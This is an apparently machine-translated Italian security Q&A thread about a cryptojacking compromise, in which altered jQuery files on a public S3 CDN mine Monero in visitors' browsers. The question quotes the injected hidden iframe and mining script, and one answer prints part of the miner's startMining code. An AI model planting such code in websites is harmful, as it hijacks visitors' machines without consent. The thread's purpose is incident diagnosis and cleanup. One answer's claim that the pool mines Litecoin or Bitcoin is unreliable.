Monero estratto sul nostro server

Naviga le tue risposte
0

Ho notato che recentemente il nostro sito Web ha avuto scarso rendimento e spesso utilizza il 100% di utilizzo della CPU sulle macchine degli utenti. Dopo aver esaminato ciò, ho notato che tutti i file jQuery sul nostro CDN sono stati modificati 6 giorni fa e ora stanno estraendo il lato client Monero quando le persone visualizzano il nostro sito Web.

Il seguente iframe viene caricato sulla nostra pagina: 

<iframe src="https://www.jqr-cdn.download/lot.html"style="width: 0px; height: 1px;">
<html>
    <head></head>
    <body>
        <script src="jquery-3.3.1.js"></script>
        <script>
            server = "wss://www.jqr-cdn.download:8190";
            startMining("minexmr.com","winner winner chicken dinner");
        </script>
    </body>
</html>

I penso questo è dovuto al fatto che il nostro S3 sia pubblicamente scrivibile (dovrò esaminarlo)

Le mie domande sono:

È appena stato un leech della CPU, o qualsiasi altra cosa nefasta si verifica attraverso questo metodo di attacco (raccolta dei dati, ecc.)

Chiudendo il nostro S3 e sovrascrivendo i file con copie originali risolverà il problema, se così fosse lo risolverà in modo permanente?

Qual è il significato del parametro "cena del vincitore del pollo", si tratta di un nome utente, solo una provocazione o qualcos'altro?

    
posta Aphire 18.06.2018 - 15:00
fonte

3 risposte

3

Prima di tutto: il tuo server è stato compromesso. L'autore dell'attacco ha i mezzi per modificare il file sul sito Web, copiando qualsiasi file. Probabilmente ha anche accesso a qualsiasi database: se il sito ha accesso al database, l'utente malintenzionato può trovare le credenziali e accedervi anche.

Di solito questi tipi di attacchi richiedono il minimo lavoro e il più grande pagamento: rilascia un file javascript di crittografia e vai via. Questo tipo di script utilizzerà la CPU dei visitatori per estrarre le criptovalute, la maggior parte dei quali è Monero. Monero è una moneta incentrata sulla privacy: è assurdamente difficile trovare il proprietario di un portafoglio Monero, anche l'FBI ha difficoltà a farlo. Ma anche altre monete stanno comparendo.

Come ripulire?

Primo passaggio: ripulisci il tuo account Amazon . Supponiamo che l'autore dell'attacco abbia accesso ad esso e tutte le credenziali su di esso. Questo è fondamentale, dovrebbe essere fatto immediatamente, prima di ogni altra cosa.

Secondo: ripristinare i backup per pulire il sito. Guarda qualsiasi file caricato dall'utente (se il tuo sito ha questa funzionalità), guarda i log di accesso per rilevare qualcosa di sospetto.

Terzo: verifica il database, prestando particolare attenzione alle tabelle relative al controllo degli accessi e all'autenticazione degli utenti. Verifica se è stata creata una stored procedure o un trigger e pulisci anche questo.

A seconda del contenuto del tuo sito (come dati utente personali, record medici o finanziari, ecc.), categoria e giurisdizione, devi avvisare i tuoi utenti della violazione.

    
risposta data 18.06.2018 - 18:19
fonte
4

Il collegamento di Java-Script è stato caricato. Se lo formatti, sembra che questo:

link

Quindi viene chiamata la funzione startMining. 

function startMining(e, r, m, n, y) {
    m = void 0 === m ? "" : m;
    n = void 0 === n ? -1 : n;
    y = void 0 === y ? "" : y;
    wasmSupported && (stopMining(), connected = 0, handshake = {
        identifier: "handshake",
        pool: e,
        login: r,
        password: m,
        userid: y,
        version: 5
    }, startBroadcast(function() {
        addWorkers(n);
        reconnector()
    }))
}

Non ho visto alcuna indicazione nello script, che i tuoi dati siano accessibili, ma dovresti ricontrollare l'intero script.

Tieni presente che lo script potrebbe essere modificato, quindi non potresti mai essere sicuro, lo script corrente sul server è lo script eseguito sul tuo sistema.

Devi controllare come l'autore dell'attacco ha inserito i file jquery sul tuo sistema. Se i file sono scrivibili per tutti, questo potrebbe essere il problema e sovrascrivere con un backup e la regolazione dei diritti dovrebbe aiutare. Non dimenticare di cambiare le password, in quanto l'utente malintenzionato potrebbe averli estratti.

    
risposta data 18.06.2018 - 16:08
fonte
2

A partire dall'ultima domanda:

The Phrase: "vincitore del pollo cena vincitore" Si distingue per un minatore di CPU per Litecoin e Bitcoin (principalmente Bitcoin). Il che significa:

Questo minatore JQuery usa Protocollo Websockets per connettersi al Master e usa minexmr.com Servizio per estrarre Litecoin e / o Bitcoin con gli Slaves (tutti, chi apre il tuo sito web)

La maggior parte dei browser moderni ha una funzione per evitare che il mining indesiderato scarichi il sito web o il codice su un sito web. Come per esempio opera 50 .

Alla tua seconda domanda:

Sì, se qualcuno non ha apportato esplicitamente le modifiche sei stato violato. Prendi in considerazione la possibilità di controllare tutti i dati su quel server e anche di modificare la password in uno sicuro (complesso) o meglio 2FA o MFA con una password complessa.

e ora al primo:

Sì, normalmente è solo una leech della CPU per estrarre della valuta Crypto ma finché non si ha accesso ai dati di origine di questo script / script nessuno sarà in grado di dire se questa è / era l'unica ragione.

    
risposta data 18.06.2018 - 15:52
fonte

Leggi altre domande sui tag

Perché i dispositivi del router in tutto il mondo non possono bloccare automaticamente pacchetti dannosi? Come trovare la vulnerabilità del mio server dopo l'attacco? [duplicare]